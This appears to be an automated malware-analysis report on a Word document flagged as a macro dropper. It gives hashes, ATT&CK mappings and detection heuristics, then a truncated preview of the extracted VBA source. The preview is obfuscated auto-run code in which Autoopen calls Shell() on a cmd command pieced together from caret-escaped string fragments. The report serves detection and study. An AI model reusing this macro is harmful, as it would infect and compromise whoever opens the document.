Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18b3872a5e7ab2fd…

MALICIOUS

Office (OLE)

Size: 113.5 KB
Created: 2018-06-04 05:07:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: b77422f1a36d53e352f24be3ec726236
SHA-1: 3309b3f7cc4ddb2fc2304d3ccfeb2fc38940915a
SHA-256: 18b3872a5e7ab2fddf9123b58e4378bcdaf1d7d94e3e0c723382948ca2f17c79
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine calls the ZkIovX function, which uses Shell() to execute a command line that is assembled at runtime by concatenating string fragments held in several variables, most likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6571989-0' further supports its role as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6571989-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6571989-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18812 bytes
SHA-256: 472bd6293df97bafcb45334aeafdd4ae375943ece75ddf717e33882558ef5977

Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "THTwsNQcNh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ZkIovX()
On Error Resume Next
For ZZtizc = GmVsi To 92521
         sFwsq = (rmtfo - ChrW(45616 * 82450) * CDfqr * CInt(VjLAiA + Sqr(69118)) + 42343 - 49452 / 55621 - CDate(tIFjHf - 45867 + 30394 - Hex(tnfNu / 50206)) + (DDjqBr * Tan(vJtvJ)))
Next
For aVMQqv = lcuYH To 52284
         AiDzGI = (jSqmn - ChrW(2632 * 12229) * XNjOZ * CInt(XbOXzL + Sqr(99775)) + 52196 - 17807 / 20858 - CDate(aPCNFv - 78997 + 2018 - Hex(uDViDt / 16289)) + (FjotBn * Tan(HpaHzO)))
Next
ZkIovX = ssCTKKIf + Shell(KpiUXirB + Chr(fDQVTzFlZw + vbKeyC + XRFjdqA) + nntasMB + vFmzhO + lTanS + lvMqirfr + FianJj + hVUTfwz + EpFihnnTn, diqzBvlEvt + 0 + vsGBPTJXYF)
For IfEMl = vRRuN To 97374
         UFkUFC = (VcWpZ - ChrW(54931 * 48234) * QVhDM * CInt(uqaqIE + Sqr(63930)) + 76999 - 28658 / 87524 - CDate(CtIBFF - 3719 + 89293 - Hex(jjJOnI / 60106)) + (BwMJmE * Tan(PKdww)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For hNcIWi = ELPfJ To 39880
         OjLDz = (smSjW - ChrW(31626 * 79719) * mvbFvB * CInt(SjGQZ + Sqr(28709)) + 68848 - 80900 / 61910 - CDate(ARzLiw - 51514 + 94427 - Hex(zuuwm / 11802)) + (hSQnaN * Tan(EvAFm)))
Next
ZkIovX
For JIwmz = wrXEw To 2303
         VEHYj = (KjhRZ - ChrW(85064 * 11854) * wtQhto * CInt(PowIw + Sqr(29325)) + 13862 - 3726 / 18459 - CDate(TmSrO - 94666 + 44756 - Hex(lbtcr / 43810)) + (tkAwHW * Tan(MkGPJ)))
Next
End Sub
Attribute VB_Name = "nEDiYDGFn"
Function nntasMB()
On Error Resume Next
For QHloj = zUwUo To 28293
         hPZcc = (KhsDui - ChrW(95304 * 74703) * EvuuVM * CInt(BTOcrn + Sqr(20859)) + 16739 - 99346 / 5632 - CDate(PRtEVS - 36590 + 35412 - Hex(XEqKj / 47124)) + (QBZts * Tan(qOGNzF)))
Next
wFqcO = "md VwplwTjVSa" + "nff NVaXENuBoUT" + "EGB" + "iiiT" + "ZsR" + "Vz" + "bJLSE wtOidREII"
For WjDrq = Vqzabb To 6590
         SwcEtT = (uHZJv - ChrW(41416 * 50727) * zHSNvv * CInt(AzTBCZ + Sqr(31832)) + 51445 - 96540 / 33574 - CDate(AXRdIG - 73775 + 98241 - Hex(cdhvMv / 22653)) + (SIOIw * Tan(wdlsQw)))
Next
UWWkpbwH = "jw &   " + "  %^c^o^m^S^p^E" + "^c^%   " + "  %^c^o^m^S^p"
For jbsFVC = UzMbw To 36120
         WRYoH = (OIpDh - ChrW(3326 * 85839) * zXNVA * CInt(vCpprs + Sqr(97927)) + 65355 - 37147 / 92471 - CDate(LfTaMM - 7195 + 17081 - Hex(PYmpYT / 19034)) + (UbzFvT * Tan(UbizO)))
Next
aKUvcLKzdV = "^E^c^%     /V" + "        " + " /c " + "          set %"
For jotPV = YunKJ To 25082
         jWQAR = (iHNrz - ChrW(66016 * 30847) * DGliF * CInt(VijsZC + Sqr(95338)) + 71275 - 94466 / 62918 - CDate(psfks - 7721 + 51722 - Hex(afHSz / 92958)) + (FKUoCj * Tan(SuAnX)))
Next
FccrbhHUT = "TIVSt" + "NibnsJMFFv%=dvu" + "BbzH&&set" + " %PG" + "MqAzsbqTEKX%=p" + "&&" + "set"
For PZzJha = qkbLC To 19603
         fOOQm = (swnQIi - ChrW(70292 * 71675) * lkFjz * CInt(AizlW + Sqr(77826)) + 82695 - 40996 / 67431 - CDate(msTYE - 61524 + 69433 - Hex(aiSmh / 2443)) + (qWRwr * Tan(VKLff)))
Next
RDEztEzuizp = " %tbij" + "akMCF%=o^w&&set" + " %YaqXXcaZ" + "VnbZJzf%" + "=wdqQomh" + "IdhRb&&set %OWk" + "Yqzw%=!" + "%PG"
For iPIBb = GWmRN To 38875
         AEGRj = (AwijR - ChrW(49632 * 43081) * EQhIsY * CInt(FlShq + Sqr(65970)) + 52309 - 58996 / 31922 - CDate(JwtqB - 29592 + 86480 - Hex(RfTwjq / 52884)) + (MCFEJ * Tan(vpuTn)))
Next
QEHVHw = "MqAzsbqTEKX%" + "!&&set %NOiWVAw" + "sCqKzNSo%=i" + "fmAwNwXl" + "h&" + "&set %zOkzT" + "jOqn%=e^r&&s" + "et %"
For sfZRSH = ccBDB To 78776
         btvJBc = (lWYYM - ChrW(30309 * 79320) * DwhbJ * CInt(mGCdbh + Sqr(97445)) + 53939 - 21499 / 98222 - CDate(PctBu - 72076 + 33481 - Hex(iHJAt / 11172)) + (TbZEVZ * Tan(wontfa)))
Next
MzGfWhUGZ = "SssTTpdvC%=!" + "%tbijakMCF%!&&s" + "et %qDchRI" + "rTil" + "YU%=s&&s" + "et %TlsitpLzMG"
For HJKZUz = wzJKQR To 59504
         cFJYjO = (CGdfj - ChrW(56958 * 8158) * BGrQW * CInt(waYIEW + Sqr(52288)) + 31572 - 88611 / 1
... (truncated)